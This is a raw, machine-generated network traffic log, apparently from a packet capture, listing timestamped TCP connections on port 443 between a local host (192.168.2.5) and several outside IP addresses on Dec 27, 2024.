                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.426405907 CET49848443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.706706047 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.706720114 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.706787109 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.707847118 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.707859039 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.979835033 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.979917049 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.980143070 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.980798960 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:42.980832100 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.170423985 CET44349838188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.170495033 CET44349838188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.170557976 CET49838443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.171462059 CET49838443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.171478033 CET44349838188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.312843084 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.313508987 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.313523054 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.314994097 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.315052032 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.317152977 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.317240953 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.363409042 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.363421917 CET4434986123.44.201.11192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.408874989 CET49861443192.168.2.523.44.201.11
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.447007895 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.447062969 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.447160959 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.447410107 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.447427988 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.596000910 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.596467972 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.596499920 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.598035097 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.598217964 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.599922895 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.600052118 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.673495054 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.675446033 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.675462008 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.676512003 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.676579952 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.677126884 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.677392006 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.705652952 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.705682993 CET4434986220.110.205.119192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.720593929 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.720609903 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.743376970 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.743664980 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.744201899 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.744220018 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746299982 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746309042 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746334076 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746352911 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746395111 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746409893 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746432066 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746432066 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746440887 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746455908 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746468067 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746474028 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746586084 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746601105 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746615887 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746615887 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746625900 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746642113 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746757030 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746771097 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746793985 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746818066 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746820927 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.746829033 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747548103 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747565985 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747684002 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747698069 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747741938 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747756958 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747829914 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747844934 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747855902 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747868061 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747935057 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747950077 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747956038 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.747960091 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.767021894 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.813569069 CET49862443192.168.2.520.110.205.119
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.931433916 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.931747913 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.931759119 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.932826042 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.932904959 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.934286118 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.934376955 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.983237982 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:43.983252048 CET4434987023.44.201.28192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.029542923 CET49870443192.168.2.523.44.201.28
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.452960968 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.453334093 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.453382015 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.455034971 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.455113888 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.456484079 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.456600904 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.502572060 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.502620935 CET4434987318.238.49.124192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.548223972 CET49873443192.168.2.518.238.49.124
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.876821041 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.877109051 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.879220963 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.879225969 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882324934 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882325888 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882337093 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882348061 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882535934 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882555962 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882709026 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.882774115 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883032084 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883057117 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883073092 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883083105 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883240938 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883253098 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883280039 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883287907 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883310080 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883339882 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883342981 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883364916 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883404016 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883425951 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883483887 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883497953 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883512020 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883533001 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883637905 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883655071 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883676052 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883686066 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883702993 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883812904 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883848906 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.883865118 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.927349091 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.927628040 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:44.975321054 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.807650089 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.807728052 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.807744026 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.808082104 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.808885098 CET49865443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.808900118 CET44349865188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.996711016 CET4434976923.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:45.996789932 CET49769443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:46.491987944 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:46.492024899 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:46.492135048 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:46.492429972 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:46.492439985 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.152422905 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.152499914 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.152523041 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.152554989 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.154220104 CET49875443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.154237032 CET44349875188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.269947052 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.269973040 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.270240068 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.270988941 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.271003962 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.271357059 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.271390915 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.271545887 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.271712065 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.271729946 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.300062895 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.347331047 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.650124073 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.650556087 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.650614023 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.655875921 CET49866443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.655900955 CET4434986623.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.687743902 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.687798023 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.687906027 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.689074993 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.689090967 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.941293955 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.941468000 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.942157030 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.942162991 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944183111 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944189072 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944245100 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944252968 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944281101 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944289923 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944307089 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944312096 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944330931 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944341898 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944417000 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944427013 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944437981 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944447994 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944506884 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944514036 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944633961 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944645882 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944695950 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944708109 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944799900 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944807053 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944818974 CET49888443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:47.944823027 CET44349888188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.531179905 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.531655073 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.531681061 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.532046080 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.532367945 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.532430887 CET4434989823.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.532805920 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.533083916 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.533094883 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.533418894 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.533853054 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.533919096 CET4434989923.209.72.25192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.575577021 CET49898443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:48.581425905 CET49899443192.168.2.523.209.72.25
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.133238077 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.133495092 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.135951042 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.135957956 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138524055 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138529062 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138643026 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138662100 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138673067 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138681889 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138756037 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138772011 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138786077 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.138794899 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140307903 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140316963 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140394926 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140405893 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140428066 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140439987 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140460014 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140475035 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140520096 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140538931 CET44349902188.245.216.205192.168.2.5
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140567064 CET49902443192.168.2.5188.245.216.205
                                                                                                                                                                                                                                                                        Dec 27, 2024 08:20:49.140583992 CET44349902188.245.216.205192.168.2.5
